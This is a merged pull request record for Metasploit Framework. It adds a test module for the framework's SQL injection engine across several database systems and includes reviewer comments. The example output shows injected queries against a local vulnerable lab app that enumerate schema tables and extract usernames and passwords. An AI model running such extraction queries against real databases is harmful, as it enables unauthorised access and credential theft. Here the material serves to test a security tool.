### PR TITLE
[Test module] Remove obsolete PostgreSQL test module. Replace it with one for all the supported DBMS

### PR DESCRIPTION
**Pull request by red0xff**
This makes it easier to test the different features of the SQL injection engine that is part of Metasploit Framework.

The vulnerable applications this module targets [can be found here](https://github.com/red0xff/sqli_vulnerable).

This allows testing different SQLi modes and options.

Fetch the commits that add MSSQL injection support before testing this (as it supports MSSQL).

Can be used to test https://github.com/rapid7/metasploit-framework/pull/16435

## Verification

- [ ] Choose a `DBMS`, run `docker-compose up -d` inside its directory.
- [ ] Load the module in `msfconsole`
- [ ] `set DBMS <number>`
- [ ] `set SQLi_Type <number`
- [ ] Set other options you want to test, eventually set `verbose`
- [ ] `run`
- [ ] **Verify** You get correct output (refer to database initialization scripts in [the sqli_vulnerable repo](https://github.com/red0xff/sqli_vulnerable)).

## Bugs found with this testing

`PostgreSQL` -> `Common`
When `safe = true` and `truncation_length > 0`.
(Todo: debug it and issue a fix).

Update: not a bug in the logic of the library, queries of the form:
```
select substr(coalesce(<COLUMN>::text,'')::text,<OFFSET>,<TRUNCATION_LENGTH>) from <TABLE> where <CONDITION> limit 1 offset 0
```
For some reason, if there are less than `<TRUNCATION_LENGTH>` characters in a given row, sometimes it selects a different row where it returns `<TRUNCATION_LENGTH>` characters or less. This yields wrong results, like "passwome" instead of "password" (where the `me` part is from `username`).

## To test again

`MySQL/MariaDB` -> `Common`
When `safe = true` and `truncation length > 0`.
(Todo: test again, on OpenEMR perhaps?)

### CODE REVIEW

File: test/modules/auxiliary/test/sqli_test.rb [hunk 1]
```diff
@@ -28,20 +27,23 @@ def initialize(info = {})
...
         OptInt.new('RPORT', [true, 'The target port', 1337]),
         OptString.new('TARGETURI', [true, 'The target URI', '/']),
-        OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
+        OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind.', 0]),
         OptBool.new('SAFE', [false, 'Use safe mode', false]),
         OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
         OptBool.new('HEX_ENCODE_STRINGS', [false, 'Replace strings in the query with hex numbers?', false]),
-        OptInt.new('TRUNCATION_LENGTH', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
+        OptInt.new('TRUNCATION_LENGTH', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0]),
+        OptInt.new('DBMS', [ true, '0)MySQL/MariaDB. 1) PostgreSQL. 2) Sqlite. 3) MSSQL.', 0])
```
Comment (adfoster-r7) [inline test/modules/auxiliary/test/sqli_test.rb:35]: I wonder if using `OptEnum` here would help improve readability/tab completion/validation/etc; Likewise with `SQLI_TYPE`

Comment (red0xff) [reply test/modules/auxiliary/test/sqli_test.rb]: Updated. For `TRUNCATION_LENGTH`, It's expected to be a positive integer, so I kept `OptInt` for it.

File: test/modules/auxiliary/test/sqli_test.rb [hunk 2]
```diff
@@ -112,11 +124,32 @@ def perform_sqli(sqli)
...
+      @dbms = case datastore['DBMS']
+        when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::TimeBasedBlind
+        when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind
+        when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::TimeBasedBlind
+        when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::TimeBasedBlind
+        else print_bad("Unsupported target")
+      end
       time_blind
     else
       print_bad('Unsupported SQLI_TYPE')
```
Comment (cdelafuente-r7) [inline test/modules/auxiliary/test/sqli_test.rb:155]: Same here, I believe `SQLI_TYPE` option is an enum and this should not be necessary.

**Comment by cdelafuente-r7** [comment]
Thanks for this test module @red0xff . It looks good to me and I'll go ahead and land it.

- Example output (MariaDB - Regular SQLi)
```
msf6 auxiliary(test/sqli_test) > run Verbose=true
[*] Running module against 127.0.0.1

[*] {SQLi} Executing (select 'aJj1Z')
[*] {SQLi} Executing (select version())
[+] dbms version: 10.4.24-MariaDB-1:10.4.24+maria~focal
[*] {SQLi} Executing (select group_concat(cast(ifnull(table_name,'') as binary) separator '@') from information_schema.tables where table_schema=database())
[+] tables: users, articles
[*] {SQLi} Executing (select group_concat(cast(ifnull(column_name,'') as binary) separator '@') from information_schema.columns where table_name='users')
[+] users(username, password)
[*] {SQLi} Executing (select group_concat(cast(concat_ws('#',ifnull(username,''),ifnull(password,'')) as binary) separator '@') from users)
[+] 	red0xff, PasswordTest1
[+] 	admin, AdminPass1337
[+] 	guest, GuestPass
[*] {SQLi} Executing (select group_concat(cast(ifnull(column_name,'') as binary) separator '@') from information_schema.columns where table_name='articles')
[+] articles(id, content)
[*] {SQLi} Executing (select group_concat(cast(concat_ws('#',ifnull(id,''),ifnull(content,'')) as binary) separator '@') from articles)
[+] 	1, Over 3.8 billion people use the internet today, which is 40% of the worlds population.
[+] 	2, 8 billion devices will be connected to the internet by 2020.
[+] 	3, More than 570 new websites are created every minute.
[+] 	4, There are over 3.5 billion searches per day on Google.
[+] 	5, By 2020, video will account for about 80% of all internet traffic.
[+] 	6, 340,000 tweets are sent per minute.
[+] 	7, 90% of the world’s data has been created in the last couple years.
[*] Auxiliary module execution completed
```

- Example output (MariaDB - BooleanBlind - base64 encoder)
```
msf6 auxiliary(test/sqli_test) > run Verbose=true SQLI_TYPE=BooleanBlind SAFE=true encoder=base64
[*] Running module against 127.0.0.1

[*] {SQLi} Executing (select to_base64(version()))
[*] {SQLi} Boolean-based injection: expecting output of length 52
[+] dbms version: 10.4.24-MariaDB-1:10.4.24+maria~focal
[*] {SQLi} Executing (select group_concat(cast(to_base64(ifnull(table_name,'')) as binary) separator '@') from information_schema.tables where table_schema=database())
[*] {SQLi} Boolean-based injection: expecting output of length 21
[+] tables: users, articles
[*] {SQLi} Executing (select group_concat(cast(to_base64(ifnull(column_name,'')) as binary) separator '@') from information_schema.columns where table_name='users')
[*] {SQLi} Boolean-based injection: expecting output of length 25
[+] users(username, password)
[*] {SQLi} Executing (select group_concat(cast(concat_ws('#',to_base64(ifnull(username,'')),to_base64(ifnull(password,''))) as binary) separator '@') from users)
[*] {SQLi} Boolean-based injection: expecting output of length 85
[+] 	red0xff, PasswordTest1
[+] 	admin, AdminPass1337
[+] 	guest, GuestPass
[*] {SQLi} Executing (select group_concat(cast(to_base64(ifnull(column_name,'')) as binary) separator '@') from information_schema.columns where table_name='articles')
[*] {SQLi} Boolean-based injection: expecting output of length 17
[+] articles(id, content)
[*] {SQLi} Executing (select group_concat(cast(concat_ws('#',to_base64(ifnull(id,'')),to_base64(ifnull(content,''))) as binary) separator '@') from articles)
[*] {SQLi} Boolean-based injection: expecting output of length 613
[+] 	1, Over 3.8 billion people use the internet today, which is 40% of the worlds population.
[+] 	2, 8 billion devices will be connected to the internet by 2020.
[+] 	3, More than 570 new websites are created every minute.
[+] 	4, There are over 3.5 billion searches per day on Google.
[+] 	5, By 2020, video will account for about 80% of all internet traffic.
[+] 	6, 340,000 tweets are sent per minute.
[+] 	7, 90% of the world’s data has been created in the last couple years.
[*] Auxiliary module execution completed
```

- Example output (PostgreSQL - BooleanBlind - base64 encoder)
```
msf6 auxiliary(test/sqli_test) > run Verbose=true SQLI_TYPE=BooleanBlind encoder=hex DBMS=PostgreSQL
[*] Running module against 127.0.0.1

[*] {SQLi} Executing (select encode(version()::bytea, 'hex'))
[*] {SQLi} Boolean-based injection: expecting output of length 246
[+] dbms version: PostgreSQL 13.6 (Debian 13.6-1.pgdg110+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 10.2.1-6) 10.2.1 20210110, 64-bit
[*] {SQLi} Executing (select string_agg(encode(coalesce(table_name::text,'')::bytea, 'hex')::text, '@') from information_schema.tables where table_schema='public')
[*] {SQLi} Boolean-based injection: expecting output of length 27
[+] tables: articles, users
[*] {SQLi} Executing (select string_agg(encode(coalesce(column_name::text,'')::bytea, 'hex')::text, '@') from information_schema.columns where table_name='articles' and table_schema='public')
[*] {SQLi} Boolean-based injection: expecting output of length 19
[+] articles(id, content)
[*] {SQLi} Executing (select string_agg(concat_ws('#',encode(coalesce(id::text,'')::bytea, 'hex'),encode(coalesce(content::text,'')::bytea, 'hex'))::text, '@') from articles)
[*] {SQLi} Boolean-based injection: expecting output of length 869
[+] 	1, Over 3.8 billion people use the internet today, which is 40% of the worlds population.
[+] 	2, 8 billion devices will be connected to the internet by 2020.
[+] 	3, More than 570 new websites are created every minute.
[+] 	4, There are over 3.5 billion searches per day on Google.
[+] 	5, By 2020, video will account for about 80% of all internet traffic.
[+] 	6, 340,000 tweets are sent per minute.
[+] 	7, 90% of the world’s data has been created in the last couple years.
[*] {SQLi} Executing (select string_agg(encode(coalesce(column_name::text,'')::bytea, 'hex')::text, '@') from information_schema.columns where table_name='users' and table_schema='public')
[*] {SQLi} Boolean-based injection: expecting output of length 33
[+] users(username, password)
[*] {SQLi} Executing (select string_agg(concat_ws('#',encode(coalesce(username::text,'')::bytea, 'hex'),encode(coalesce(password::text,'')::bytea, 'hex'))::text, '@') from users)
[*] {SQLi} Boolean-based injection: expecting output of length 109
[+] 	red0xff, PasswordTest1
[+] 	admin, AdminPass1337
[+] 	guest, GuestPass
[*] Auxiliary module execution completed
```

**Comment by cdelafuente-r7** [comment]
I added a last minute [commit](https://github.com/rapid7/metasploit-framework/commit/365cebce1a7b5edf06658c574f40d4094ae02a9d) to fix issues reported by `rubobop`. Apparently, `msftidy.rb` does to run automatically (yet) for test modules. So, I did it manually.

**Pull request merged**